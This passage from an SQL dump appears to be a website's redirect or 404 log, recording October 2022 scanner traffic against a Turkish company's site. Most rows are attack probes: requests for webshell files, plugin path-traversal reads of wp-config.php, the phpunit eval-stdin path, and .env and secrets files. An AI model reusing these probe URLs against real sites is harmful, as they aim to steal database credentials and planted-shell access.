00:00:00',301),(30303,'http://mail.3s-technologies.com.tr/en/alfindex.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:32','0000-00-00 00:00:00',301),(30304,'http://mail.3s-technologies.com.tr/en/cindex.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:52','0000-00-00 00:00:00',301),(30305,'http://mail.3s-technologies.com.tr/en/wp-content/wp-1ogin_bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:55','0000-00-00 00:00:00',301),(30306,'http://mail.3s-technologies.com.tr/en/wp-1ogin_bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:46:01','0000-00-00 00:00:00',301),(30307,'http://mail.3s-technologies.com.tr/en/wp-includes/fonts/css.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:46:06','0000-00-00 00:00:00',301),(30308,'http://mail.3s-technologies.com.tr/en/old-index.php',NULL,'anonymousfox.co','',2,0,'2022-10-03 03:46:24','0000-00-00 00:00:00',301),(30309,'http://mail.3s-technologies.com.tr/en/wp-admin/config.bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:46:58','0000-00-00 00:00:00',301),(30310,'http://mail.3s-technologies.com.tr/en/wp-content/config.bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:02','0000-00-00 00:00:00',301),(30311,'http://mail.3s-technologies.com.tr/en/wp-includes/config.bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:06','0000-00-00 00:00:00',301),(30312,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/config.bak.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:18','0000-00-00 00:00:00',301),(30313,'https://mail.3s-technologies.com.tr/wp-includes/css/wp-config.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:22','0000-00-00 00:00:00',301),(30314,'http://mail.3s-technologies.com.tr/en/wp-includes/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:31','0000-00-00 00:00:00',301),(30315,'http://mail.3s-technologies.com.tr/en/haders.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:40','0000-00-00 00:00:00',301),(30316,'http://mail.3s-technologies.com.tr/en/wp-content/wp-old-index.php?action=login&pass=-1&submit=',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:47:47','0000-00-00 00:00:00',301),(30317,'http://mail.3s-technologies.com.tr/en/wp-includes/lfx.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:04','0000-00-00 00:00:00',301),(30318,'http://mail.3s-technologies.com.tr/en/wp-includes/small.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:10','0000-00-00 00:00:00',301),(30319,'http://mail.3s-technologies.com.tr/en/wp-content/langar.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:43','0000-00-00 00:00:00',301),(30320,'http://mail.3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:46','0000-00-00 00:00:00',301),(30321,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:50','0000-00-00 00:00:00',301),(30322,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:48:55','0000-00-00 00:00:00',301),(30323,'http://3s-technologies.com.tr/phpinfi.php',NULL,'','',1,0,'2022-10-03 06:16:02','0000-00-00 00:00:00',301),(30324,'https://3s-technologies.com.tr/phpinfi.php',NULL,'','',1,0,'2022-10-03 06:16:02','0000-00-00 00:00:00',301),(30325,'http://3s-technologies.com.tr/en/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'','',1,0,'2022-10-03 17:03:58','0000-00-00 00:00:00',301),(30326,'http://3s-technologies.com.tr/en/wp-includes/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'','',1,0,'2022-10-03 17:04:00','0000-00-00 00:00:00',301),(30327,'http://3s-technologies.com.tr/sysinfo_phpinfo.php',NULL,'','',1,0,'2022-10-05 04:28:13','0000-00-00 00:00:00',301),(30328,'https://3s-technologies.com.tr/sysinfo_phpinfo.php',NULL,'','',1,0,'2022-10-05 04:28:13','0000-00-00 00:00:00',301),(30329,'https://mail.3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1',NULL,'https://mail.3s-technologies.com.tr/owa/auth/logon.aspx?replaceCurrent=1','',1,0,'2022-10-05 16:13:57','0000-00-00 00:00:00',301),(30330,'https://3s-technologies.com.tr/en/products.json?page=1&limit=250',NULL,'','',1,0,'2022-10-09 14:52:48','0000-00-00 00:00:00',301),(30331,'https://3s-technologies.com.tr/tr/wp-includes/class-index-wordpress.php',NULL,'','',1,0,'2022-10-10 02:43:46','0000-00-00 00:00:00',301),(30332,'https://3s-technologies.com.tr/tr/wp-admin/js/widgets/wp-login.php',NULL,'','',1,0,'2022-10-10 02:43:49','0000-00-00 00:00:00',301),(30333,'https://3s-technologies.com.tr/tr/wp-includes/wp-system-cloud.php',NULL,'','',1,0,'2022-10-10 02:43:55','0000-00-00 00:00:00',301),(30334,'https://3s-technologies.com.tr/tr/wp-includes/class-wp-page-icon.php',NULL,'','',1,0,'2022-10-10 02:43:57','0000-00-00 00:00:00',301),(30335,'https://3s-technologies.com.tr/tr/wp-includes/class-wordpress-license.php',NULL,'','',1,0,'2022-10-10 02:44:01','0000-00-00 00:00:00',301),(30336,'http://3s-technologies.com.tr/phpinfo',NULL,'','',2,0,'2022-10-10 04:22:28','0000-00-00 00:00:00',301),(30337,'https://3s-technologies.com.tr/phpinfo',NULL,'','',2,0,'2022-10-10 04:22:28','0000-00-00 00:00:00',301),(30338,'https://3s-technologies.com.tr/en/images/ddm/le40v.png',NULL,'','',13,0,'2022-10-13 10:29:05','0000-00-00 00:00:00',301),(30339,'https://3s-technologies.com.tr/en/images/logo/logo-3s.jpg',NULL,'','',13,0,'2022-10-13 10:29:05','0000-00-00 00:00:00',301),(30340,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/pause.png',NULL,'','',13,0,'2022-10-13 10:29:05','0000-00-00 00:00:00',301),(30341,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/play.png',NULL,'','',13,0,'2022-10-13 10:29:05','0000-00-00 00:00:00',301),(30342,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/prev.png',NULL,'','',13,0,'2022-10-13 10:29:06','0000-00-00 00:00:00',301),(30343,'https://3s-technologies.com.tr/en/media/mod_languages/images/tr.gif',NULL,'','',13,0,'2022-10-13 10:29:06','0000-00-00 00:00:00',301),(30344,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/next.png',NULL,'','',13,0,'2022-10-13 10:29:10','0000-00-00 00:00:00',301),(30345,'https://3s-technologies.com.tr/en/media/mod_languages/images/en.gif',NULL,'','',13,0,'2022-10-13 10:29:10','0000-00-00 00:00:00',301),(30346,'http://3s-technologies.com.tr/en/wp-content/plugins/iwp-client/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:15','0000-00-00 00:00:00',301),(30347,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-time-capsule/readme.txt',NULL,'https://www.google.com','',3,0,'2022-10-14 05:40:20','0000-00-00 00:00:00',301),(30348,'http://3s-technologies.com.tr/en/wp-content/plugins/themegrill-demo-importer/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:22','0000-00-00 00:00:00',301),(30349,'http://3s-technologies.com.tr/en/wp-content/plugins/advanced-import/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:24','0000-00-00 00:00:00',301),(30350,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-jetpack/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:26','0000-00-00 00:00:00',301),(30351,'http://3s-technologies.com.tr/en/wp-content/plugins/emails-verification-for-woocommerce/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:28','0000-00-00 00:00:00',301),(30352,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:31','0000-00-00 00:00:00',301),(30353,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:33','0000-00-00 00:00:00',301),(30354,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-automatic/changelog',NULL,'https://www.google.com','',4,0,'2022-10-14 05:40:35','0000-00-00 00:00:00',301),(30355,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-automatic/css/wp-automatic.css',NULL,'https://www.google.com','',4,0,'2022-10-14 05:40:38','0000-00-00 00:00:00',301),(30356,'http://3s-technologies.com.tr/en/wp-content/plugins/capability-manager-enhanced/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:40','0000-00-00 00:00:00',301),(30357,'http://3s-technologies.com.tr/en/wp-content/plugins/capabilities-pro/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:42','0000-00-00 00:00:00',301),(30358,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-pinterest-automatic/changelog',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:45','0000-00-00 00:00:00',301),(30359,'http://3s-technologies.com.tr/en/wp-content/plugins/ulisting/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:47','0000-00-00 00:00:00',301),(30360,'http://3s-technologies.com.tr/en/wp-content/plugins/image-hover-effects-ultimate/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:49','0000-00-00 00:00:00',301),(30361,'http://3s-technologies.com.tr/en/wp-content/plugins/ait-csv-import-export/changelog.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:52','0000-00-00 00:00:00',301),(30362,'http://3s-technologies.com.tr/en/wp-content/plugins/angwp/__ updates.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:54','0000-00-00 00:00:00',301),(30363,'http://3s-technologies.com.tr/en/wp-content/plugins/e-signature/page-template/default/style.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:57','0000-00-00 00:00:00',301),(30364,'http://3s-technologies.com.tr/en/wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:40:59','0000-00-00 00:00:00',301),(30365,'http://3s-technologies.com.tr/en/wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:02','0000-00-00 00:00:00',301),(30366,'http://3s-technologies.com.tr/en/wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:04','0000-00-00 00:00:00',301),(30367,'http://3s-technologies.com.tr/en/wp-content/plugins/mstore-api/readme.txt',NULL,'https://www.google.com','',3,0,'2022-10-14 05:41:07','0000-00-00 00:00:00',301),(30368,'http://3s-technologies.com.tr/en/wp-content/plugins/dzs-zoomsounds/admin/admin.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:09','0000-00-00 00:00:00',301),(30369,'http://3s-technologies.com.tr/en/wp-content/plugins/shortcode-addons/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:11','0000-00-00 00:00:00',301),(30370,'http://3s-technologies.com.tr/en/wp-content/plugins/vc-tabs/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:14','0000-00-00 00:00:00',301),(30371,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:41:17','0000-00-00 00:00:00',301),(30372,'http://3s-technologies.com.tr/en/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt',NULL,'https://www.google.com','',3,0,'2022-10-14 05:41:19','0000-00-00 00:00:00',301),(30373,'http://3s-technologies.com.tr/en/wp-content/plugins/mapsvg-lite-interactive-vector-maps/gm_download.php?file=/wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:41:21','0000-00-00 00:00:00',301),(30374,'http://3s-technologies.com.tr/en/wp-content/plugins/mapsvg/gm_download.php?file=/wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:41:25','0000-00-00 00:00:00',301),(30375,'http://3s-technologies.com.tr/en/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'https://www.google.com','',8,0,'2022-10-14 05:41:29','0000-00-00 00:00:00',301),(30376,'http://3s-technologies.com.tr/en/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:41:49','0000-00-00 00:00:00',301),(30377,'http://3s-technologies.com.tr/en/wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:41:54','0000-00-00 00:00:00',301),(30378,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:42:00','0000-00-00 00:00:00',301),(30379,'http://3s-technologies.com.tr/en/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:42:04','0000-00-00 00:00:00',301),(30380,'http://3s-technologies.com.tr/en/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php',NULL,'https://www.google.com','',1,0,'2022-10-14 05:42:07','0000-00-00 00:00:00',301),(30381,'http://3s-technologies.com.tr/en/wp-content/plugins/tatsu/changelog.md',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:12','0000-00-00 00:00:00',301),(30382,'http://3s-technologies.com.tr/en/wp-content/plugins/udraw/readme.txt',NULL,'https://www.google.com','',1,0,'2022-10-14 05:42:16','0000-00-00 00:00:00',301),(30383,'http://3s-technologies.com.tr/en/wp-content/plugins/woo-product-table/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:20','0000-00-00 00:00:00',301),(30384,'http://3s-technologies.com.tr/en/wp-content/plugins/wpcargo/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:22','0000-00-00 00:00:00',301),(30385,'http://3s-technologies.com.tr/en/wp-content/plugins/nd-learning/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:25','0000-00-00 00:00:00',301),(30386,'http://3s-technologies.com.tr/en/wp-content/plugins/nd-shortcodes/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:29','0000-00-00 00:00:00',301),(30387,'http://3s-technologies.com.tr/en/wp-content/plugins/nd-booking/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:34','0000-00-00 00:00:00',301),(30388,'http://3s-technologies.com.tr/en/wp-content/plugins/nd-donations/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:37','0000-00-00 00:00:00',301),(30389,'http://3s-technologies.com.tr/en/wp-content/plugins/nd-restaurant-reservations/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:41','0000-00-00 00:00:00',301),(30390,'http://3s-technologies.com.tr/en/wp-content/plugins/sitemap-by-click5/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:45','0000-00-00 00:00:00',301),(30391,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-user-avatar/changelog.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:47','0000-00-00 00:00:00',301),(30392,'http://3s-technologies.com.tr/en/wp-content/plugins/quiz-master-next/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:53','0000-00-00 00:00:00',301),(30393,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:56','0000-00-00 00:00:00',301),(30394,'http://3s-technologies.com.tr/en/wp-content/plugins/armember-membership/readme.txt',NULL,'https://www.google.com','',2,0,'2022-10-14 05:42:58','0000-00-00 00:00:00',301),(30395,'http://3s-technologies.com.tr/en/wp-content/plugins/ninja-forms/readme.txt',NULL,'https://www.google.com','',5,0,'2022-10-14 05:43:01','0000-00-00 00:00:00',301),(30396,'http://3s-technologies.com.tr/en/wp-content/plugins/ultimate-member/readme.txt',NULL,'https://www.google.com','',3,0,'2022-10-14 05:43:16','0000-00-00 00:00:00',301),(30397,'http://3s-technologies.com.tr/en/wp-content/plugins/wpgateway/images/lead-menu-icon.png',NULL,'https://www.google.com','',1,0,'2022-10-14 05:43:18','0000-00-00 00:00:00',301),(30398,'http://3s-technologies.com.tr/en/blog/readme.html',NULL,'http://3s-technologies.com.tr/blog/readme.html','',1,0,'2022-10-15 05:02:00','0000-00-00 00:00:00',301),(30399,'http://mail.3s-technologies.com.tr/tr/vendor/.env',NULL,'','',1,0,'2022-10-15 10:12:40','0000-00-00 00:00:00',301),(30400,'http://mail.3s-technologies.com.tr/tr/admin/.env',NULL,'','',1,0,'2022-10-15 10:12:43','0000-00-00 00:00:00',301),(30401,'http://mail.3s-technologies.com.tr/tr/mail.3s-technologies.com.tr/.env',NULL,'','',1,0,'2022-10-15 10:12:46','0000-00-00 00:00:00',301),(30402,'https://3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',6,0,'2022-10-16 01:20:15','0000-00-00 00:00:00',301),(30403,'http://3s-technologies.com.tr/en/contacts/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',2,0,'2022-10-18 06:11:22','0000-00-00 00:00:00',301),(30404,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/tatsu/readme.txt',NULL,'','',1,0,'2022-10-18 08:41:01','0000-00-00 00:00:00',301),(30405,'http://www.3s-technologies.com.tr/tr/vendor/.env',NULL,'','',1,0,'2022-10-18 18:29:48','0000-00-00 00:00:00',301),(30406,'http://www.3s-technologies.com.tr/tr/admin/.env',NULL,'','',5,0,'2022-10-18 18:29:48','0000-00-00 00:00:00',301),(30407,'http://www.3s-technologies.com.tr/tr/www.3s-technologies.com.tr/.env',NULL,'','',1,0,'2022-10-18 18:29:49','0000-00-00 00:00:00',301),(30408,'https://3s-technologies.com.tr/en/79-english-uk/101-panasonic-overview-2',NULL,'https://www.google.com/','',49,0,'2022-10-20 10:29:13','0000-00-00 00:00:00',301),(30409,'http://3s-technologies.com.tr/tr/infophp.php',NULL,'','',5,0,'2022-10-22 08:16:37','0000-00-00 00:00:00',301),(30410,'http://3s-technologies.com.tr/tr/dashboard/phpinfo.php',NULL,'','',1,0,'2022-10-22 08:16:39','0000-00-00 00:00:00',301),(30411,'http://3s-technologies.com.tr/tr/php-info.php',NULL,'','',3,0,'2022-10-22 08:16:40','0000-00-00 00:00:00',301),(30412,'http://3s-technologies.com.tr/tr/linusadmin-phpinfo.php',NULL,'','',1,0,'2022-10-22 08:16:41','0000-00-00 00:00:00',301),(30413,'http://3s-technologies.com.tr/tr/infos.php',NULL,'','',26,0,'2022-10-22 08:16:41','0000-00-00 00:00:00',301),(30414,'http://3s-technologies.com.tr/tr/old_phpinfo.php',NULL,'','',5,0,'2022-10-22 08:16:42','0000-00-00 00:00:00',301),(30415,'http://3s-technologies.com.tr/tr/temp.php',NULL,'','',43,0,'2022-10-22 08:16:43','0000-00-00 00:00:00',301),(30416,'http://3s-technologies.com.tr/tr/time.php',NULL,'','',6,0,'2022-10-22 08:16:44','0000-00-00 00:00:00',301),(30417,'http://3s-technologies.com.tr/tr/phpversion.php',NULL,'','',3,0,'2022-10-22 08:16:45','0000-00-00 00:00:00',301),(30418,'http://3s-technologies.com.tr/tr/pinfo.php',NULL,'','',39,0,'2022-10-22 08:16:46','0000-00-00 00:00:00',301),(30419,'http://3s-technologies.com.tr/tr/asdf.php',NULL,'','',14,0,'2022-10-22 08:16:47','0000-00-00 00:00:00',301),(30420,'http://3s-technologies.com.tr/tr/config/config.json',NULL,'','',3,0,'2022-10-22 08:16:49','0000-00-00 00:00:00',301),(30421,'http://3s-technologies.com.tr/tr/info.json',NULL,'','',1,0,'2022-10-22 08:16:50','0000-00-00 00:00:00',301),(30422,'http://3s-technologies.com.tr/tr/.config/gatsby/config.json',NULL,'','',1,0,'2022-10-22 08:16:51','0000-00-00 00:00:00',301),(30423,'http://3s-technologies.com.tr/tr/.cordova/config.json',NULL,'','',1,0,'2022-10-22 08:16:51','0000-00-00 00:00:00',301),(30424,'http://3s-technologies.com.tr/tr/.deployment-config.json',NULL,'','',1,0,'2022-10-22 08:16:52','0000-00-00 00:00:00',301),(30425,'http://3s-technologies.com.tr/tr/.docker/config.json',NULL,'','',1,0,'2022-10-22 08:16:53','0000-00-00 00:00:00',301),(30426,'http://3s-technologies.com.tr/tr/.docker/daemon.json',NULL,'','',1,0,'2022-10-22 08:16:54','0000-00-00 00:00:00',301),(30427,'http://3s-technologies.com.tr/tr/.jupyter/jupyter_notebook_config.json',NULL,'','',1,0,'2022-10-22 08:16:54','0000-00-00 00:00:00',301),(30428,'http://3s-technologies.com.tr/tr/.lanproxy/config.json',NULL,'','',1,0,'2022-10-22 08:16:55','0000-00-00 00:00:00',301),(30429,'http://3s-technologies.com.tr/tr/_wpeprivate/config.json',NULL,'','',2,0,'2022-10-22 08:16:56','0000-00-00 00:00:00',301),(30430,'http://3s-technologies.com.tr/tr/console/base/config.json',NULL,'','',1,0,'2022-10-22 08:16:57','0000-00-00 00:00:00',301),(30431,'http://3s-technologies.com.tr/tr/console/payments/config.json',NULL,'','',1,0,'2022-10-22 08:16:58','0000-00-00 00:00:00',301),(30432,'http://3s-technologies.com.tr/tr/server/config.json',NULL,'','',1,0,'2022-10-22 08:16:58','0000-00-00 00:00:00',301),(30433,'http://3s-technologies.com.tr/tr/config.env',NULL,'','',2,0,'2022-10-22 08:17:01','0000-00-00 00:00:00',301),(30434,'http://3s-technologies.com.tr/tr/.env.dist',NULL,'','',1,0,'2022-10-22 08:17:02','0000-00-00 00:00:00',301),(30435,'http://3s-technologies.com.tr/tr/.env.dev',NULL,'','',5,0,'2022-10-22 08:17:02','0000-00-00 00:00:00',301),(30436,'http://3s-technologies.com.tr/tr/.env.local',NULL,'','',12,0,'2022-10-22 08:17:03','0000-00-00 00:00:00',301),(30437,'http://3s-technologies.com.tr/tr/public/.env',NULL,'','',10,0,'2022-10-22 08:17:04','0000-00-00 00:00:00',301),(30438,'http://3s-technologies.com.tr/tr/laravel/.env',NULL,'','',12,0,'2022-10-22 08:17:05','0000-00-00 00:00:00',301),(30439,'http://3s-technologies.com.tr/tr/laravel/core/.env',NULL,'','',2,0,'2022-10-22 08:17:06','0000-00-00 00:00:00',301),(30440,'http://3s-technologies.com.tr/tr/beta/.env',NULL,'','',2,0,'2022-10-22 08:17:06','0000-00-00 00:00:00',301),(30441,'http://3s-technologies.com.tr/tr/kyc/.env',NULL,'','',2,0,'2022-10-22 08:17:07','0000-00-00 00:00:00',301),(30442,'http://3s-technologies.com.tr/tr/admin/.env',NULL,'','',10,0,'2022-10-22 08:17:08','0000-00-00 00:00:00',301),(30443,'http://3s-technologies.com.tr/tr/prod/.env',NULL,'','',4,0,'2022-10-22 08:17:09','0000-00-00 00:00:00',301),(30444,'http://3s-technologies.com.tr/tr/.env.backup',NULL,'','',10,0,'2022-10-22 08:17:10','0000-00-00 00:00:00',301),(30445,'http://3s-technologies.com.tr/tr/.env.docker.dev',NULL,'','',1,0,'2022-10-22 08:17:10','0000-00-00 00:00:00',301),(30446,'http://3s-technologies.com.tr/tr/.env.php',NULL,'','',1,0,'2022-10-22 08:17:11','0000-00-00 00:00:00',301),(30447,'http://3s-technologies.com.tr/tr/.env.prod',NULL,'','',1,0,'2022-10-22 08:17:12','0000-00-00 00:00:00',301),(30448,'http://3s-technologies.com.tr/tr/.env.production.local',NULL,'','',1,0,'2022-10-22 08:17:13','0000-00-00 00:00:00',301),(30449,'http://3s-technologies.com.tr/tr/.env.sample.php',NULL,'','',2,0,'2022-10-22 08:17:14','0000-00-00 00:00:00',301),(30450,'http://3s-technologies.com.tr/tr/.env.save',NULL,'','',5,0,'2022-10-22 08:17:14','0000-00-00 00:00:00',301),(30451,'http://3s-technologies.com.tr/tr/.env.stage',NULL,'','',1,0,'2022-10-22 08:17:15','0000-00-00 00:00:00',301),(30452,'http://3s-technologies.com.tr/tr/.env.test',NULL,'','',1,0,'2022-10-22 08:17:16','0000-00-00 00:00:00',301),(30453,'http://3s-technologies.com.tr/tr/.env.test.localapi/.env',NULL,'','',1,0,'2022-10-22 08:17:17','0000-00-00 00:00:00',301),(30454,'http://3s-technologies.com.tr/tr/.docker/.env',NULL,'','',4,0,'2022-10-22 08:17:18','0000-00-00 00:00:00',301),(30455,'http://3s-technologies.com.tr/tr/.docker/laravel/app/.env',NULL,'','',2,0,'2022-10-22 08:17:19','0000-00-00 00:00:00',301),(30456,'http://3s-technologies.com.tr/tr/env.backup',NULL,'','',1,0,'2022-10-22 08:17:19','0000-00-00 00:00:00',301),(30457,'http://3s-technologies.com.tr/tr/.environment',NULL,'','',1,0,'2022-10-22 08:17:20','0000-00-00 00:00:00',301),(30458,'http://3s-technologies.com.tr/tr/.envrc',NULL,'','',1,0,'2022-10-22 08:17:21','0000-00-00 00:00:00',301),(30459,'http://3s-technologies.com.tr/tr/.envs',NULL,'','',1,0,'2022-10-22 08:17:22','0000-00-00 00:00:00',301),(30460,'http://3s-technologies.com.tr/tr/.env~',NULL,'','',2,0,'2022-10-22 08:17:23','0000-00-00 00:00:00',301),(30461,'http://3s-technologies.com.tr/tr/.gitlab-ci/.env',NULL,'','',1,0,'2022-10-22 08:17:23','0000-00-00 00:00:00',301),(30462,'http://3s-technologies.com.tr/tr/.vscode/.env',NULL,'','',2,0,'2022-10-22 08:17:24','0000-00-00 00:00:00',301),(30463,'http://3s-technologies.com.tr/tr/mailer/.env',NULL,'','',2,0,'2022-10-22 08:17:25','0000-00-00 00:00:00',301),(30464,'http://3s-technologies.com.tr/tr/twitter/.env',NULL,'','',1,0,'2022-10-22 08:17:26','0000-00-00 00:00:00',301),(30465,'http://3s-technologies.com.tr/tr/.env.development.local',NULL,'','',1,0,'2022-10-22 08:17:27','0000-00-00 00:00:00',301),(30466,'http://3s-technologies.com.tr/tr/wp-config.php.bak',NULL,'','',5,0,'2022-10-22 08:17:27','0000-00-00 00:00:00',301),(30467,'http://3s-technologies.com.tr/tr/wp-config.php.old',NULL,'','',5,0,'2022-10-22 08:17:28','0000-00-00 00:00:00',301),(30468,'http://3s-technologies.com.tr/tr/wp-config.php-backup',NULL,'','',1,0,'2022-10-22 08:17:29','0000-00-00 00:00:00',301),(30469,'http://3s-technologies.com.tr/tr/frontend_dev.php/$',NULL,'','',3,0,'2022-10-22 08:17:33','0000-00-00 00:00:00',301),(30470,'http://3s-technologies.com.tr/tr/config/config.js',NULL,'','',2,0,'2022-10-22 08:17:34','0000-00-00 00:00:00',301),(30471,'http://3s-technologies.com.tr/tr/js/config.js',NULL,'','',2,0,'2022-10-22 08:17:35','0000-00-00 00:00:00',301),(30472,'http://3s-technologies.com.tr/tr/js/envconfig.js',NULL,'','',1,0,'2022-10-22 08:17:36','0000-00-00 00:00:00',301),(30473,'http://3s-technologies.com.tr/tr/env.config.js',NULL,'','',1,0,'2022-10-22 08:17:37','0000-00-00 00:00:00',301),(30474,'http://3s-technologies.com.tr/tr/env.js',NULL,'','',2,0,'2022-10-22 08:17:38','0000-00-00 00:00:00',301),(30475,'http://3s-technologies.com.tr/tr/app/config.yml',NULL,'','',1,0,'2022-10-22 08:17:38','0000-00-00 00:00:00',301),(30476,'http://3s-technologies.com.tr/tr/app/config/parameters.yml',NULL,'','',1,0,'2022-10-22 08:17:39','0000-00-00 00:00:00',301),(30477,'http://3s-technologies.com.tr/tr/config/secrets.yml',NULL,'','',2,0,'2022-10-22 08:17:40','0000-00-00 00:00:00',301),(30478,'http://3s-technologies.com.tr/tr/secrets.yml',NULL,'','',1,0,'2022-10-22 08:17:41','0000-00-00 00:00:00',301),(30479,'http://3s-technologies.com.tr/tr/database.yml',NULL,'','',1,0,'2022-10-22 08:17:42','0000-00-00 00:00:00',301),(30480,'https://www.3s-technologies.com.tr/en/cart.json',NULL,'https://www.3s-technologies.com.tr/en/','',4,0,'2022-10-24 12:20:22','0000-00-00 00:00:00',301),(30481,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'','',1,0,'2022-10-26 05:35:13','0000-00-00 00:00:00',301),(30482,'http://mail.3s-technologies.com.tr/tr/login.aspx',NULL,'','',3,0,'2022-10-28 10:44:20','0000-00-00 00:00:00',301),(30483,'http://3s-technologies.com.tr/tr/lufix.php',NULL,'','',73,0,'2022-10-29 01:14:59','0000-00-00 00:00:00',301),(30484,'http://3s-technologies.com.tr/tr/wp-admin/wp.php',NULL,'','',28,0,'2022-10-29 01:19:13','0000-00-00 00:00:00',301),(30485,'http://3s-technologies.com.tr/tr/wp-content/shell.php',NULL,'','',21,0,'2022-10-29 01:19:58','0000-00-00 00:00:00',301),(30486,'http://3s-technologies.com.tr/tr/wp-content/up.php',NULL,'','',10,0,'2022-10-29 01:20:02','0000-00-00 